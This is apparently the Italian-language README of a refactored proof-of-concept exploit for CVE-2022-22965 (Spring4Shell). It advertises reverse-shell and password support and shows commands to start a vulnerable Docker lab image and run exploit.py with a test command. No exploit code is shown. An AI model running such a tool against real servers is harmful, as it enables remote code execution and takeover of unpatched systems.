
CVE-2022-22965 poc incluso supporto per reverse shell
CVE-2022-22965 poc che include supporto per reverse-shell e password. Sentiti libero di aggiungere altre cose :)
$ docker run -p 9090:8080 vulfocus/spring-core-rce-2022-03-29 # run vulnerable docker
$ python3 exploit.py -c id --password 1234 --shell_name big0us
$ python3 exploit.py --help # for more usages
Ho rifattorizzato il codice dell'exploit originale e ho aggiunto alcune funzionalità